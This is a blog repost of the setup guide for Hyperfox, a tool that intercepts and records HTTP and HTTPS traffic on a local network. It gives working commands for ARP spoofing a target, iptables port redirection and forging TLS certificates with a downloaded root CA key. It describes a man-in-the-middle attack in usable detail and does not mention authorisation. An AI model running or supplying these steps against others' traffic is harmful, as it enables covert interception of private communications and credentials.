Never Ending Security

It starts all here

Hyperfox – A security tool for proxying and recording HTTP and HTTPs traffic.

Hyperfox

Hyperfox is a security tool for proxying and recording HTTP and HTTPs communications on a LAN Network

hyperfox

Hyperfox is capable of forging SSL certificates on the fly using a root CA certificate and its corresponding key (both provided by the user). If the target machine recognizes the root CA as trusted, then HTTPs traffic can be succesfully intercepted and recorded. Hyperfox saves captured data to a SQLite database for later inspection and also provides a web interface for watching live traffic and downloading wire formatted messages.

hyperfox sql

Hyperfox is an Open Source project written in the Go programming language.

Setting up a Linux box

Identify both the local IP of the legitimate gateway and its matching network interface.

sudo route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 10.0.0.1 0.0.0.0 UG 1024 0 0 wlan0
...

The interface in this case is called wlan0 and the interface’s gateway is 10.0.0.1.

export HYPERFOX_GW=10.0.0.1
export HYPERFOX_IFACE=wlan0

Identify the IP address of the target, let’s suppose it is 10.0.0.143.

export HYPERFOX_TARGET=10.0.0.143

Enable IP forwarding on the host for it to act (temporarily) as a common router.

sudo sysctl -w net.ipv4.ip_forward=1

Issue an iptables rule to instruct the host to redirect all traffic that goes to port80 (commonly HTTP) to the local port where Hyperfox is listening to (1080, by default).

sudo iptables -A PREROUTING -t nat -i $HYPERFOX_IFACE -p tcp \
--destination-port 80 -j REDIRECT --to-port 1080

If you’re planning to capture HTTPs traffic, then issue another iptables rule to instruct the host to redirect all traffic that goes to port 443 (commonly HTTPs) to the local port where Hyperfox is listening to (10443, by default).

sudo iptables -A PREROUTING -t nat -i $HYPERFOX_IFACE -p tcp \
--destination-port 443 -j REDIRECT --to-port 10443

Make sure to undo IP forwarding and iptables rules when they’re not needed anymore.

Capturing plain HTTP traffic

Once the interceptor host is configured to act as a router, some interesting things can be done. For example, it is possible to determine the source and destination of the packages that pass through the host, we’re going to use this fact to redirect packages with destination port 80 to Hyperfox, so we can proxy them to the original destination (and capture them in the process).

First, see Hyperfox’s options:

hyperfox -h

Now start Hyperfox without providing a root CA certificate or key, so it starts in HTTP-only mode:

hyperfox
...
2014/12/31 07:53:29 Listening for incoming HTTP client requests on 0.0.0.0:1080.

In order for the target to redirect packages intended for the router to us we usearpspoof, a tool that is part of the dsniff suite.

sudo arpspoof -i $HYPERFOX_IFACE -t $HYPERFOX_TARGET \
$HYPERFOX_GW

Once the target starts sending traffic to the host machine, it will in turn redirect port 80 traffic to Hyperfox and we’ll be able to capture everything.

Capturing HTTPs traffic

In order to capture HTTPs traffic, Hyperfox needs to decrypt the legitimate SSL communications with the original host and then encrypt them again before serving them to the target. For each host, Hyperfox will generate a certificate and key that will be signed with the the provided root CA certificate (-c) and key (-k).

hyperfox-ssl

Chances are you don’t have access to an universally trusted root CA certificate and key, so most targets will get suspicious and will interrupt the connection. In order for the target to not get suspicious, a bogus root CA must be manually installed and marked as trusted.

Hyperfox provides a ready-to-use root CA certificate that you can feed to your devices. Consult instructions on how to install certificates on the target OS and be sure to remove the certificate after your capture session is finished.

In order to start capturing SSL traffic, provide a root CA certificate and key to Hyperfox for it to enable both HTTP and HTTPs modes.

mkdir -p ssl
wget https://raw.githubusercontent.com/xiam/hyperfox/master/ssl/rootCA.crt -O ssl/rootCA.crt
wget https://raw.githubusercontent.com/xiam/hyperfox/master/ssl/rootCA.key -O ssl/rootCA.key
hyperfox -c ssl/rootCA.crt -k ssl/rootCA.key
...
2014/12/31 11:58:10 Listening for incoming HTTP client requests on 0.0.0.0:1080.
2014/12/31 11:58:10 Listening for incoming HTTPs client requests on 0.0.0.0:10443.

In order for the target to redirect packages intended for the router to us we usearpspoof, a tool that is part of the dsniff suite.

sudo arpspoof -i $HYPERFOX_IFACE -t $HYPERFOX_TARGET \
$HYPERFOX_GW

Once the target starts sending traffic to the host machine, it will in turn redirect ports 80 and 443 traffic to Hyperfox and we’ll be able to capture everything.

Getting Hyperfox

Precompiled packages
  • Linux x64
  • OSX x64
  • FreeBSD (pending)
  • OpenBSD (pending)
  • Windows (pending)

You can download a precompiled package and put it into your ~/bin directory, such as in the following example:

mkdir -p ~/bin
export BIN_URL=https://hyperfox.org/files/hyperfox-0.9-darwin-x64.bin
wget $BIN_URL -O ~/bin/hyperfox
Compiling hyperfox

In any case, compiling Hyperfox from source requires:

  • go1.4
  • gcc
  • git
How to compile on Linux
> go version
go version go1.4 linux/amd64
> go get github.com/xiam/hyperfox

More information can be found at: https://github.com/xiam/hyperfox and at: https://hyperfox.org/

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s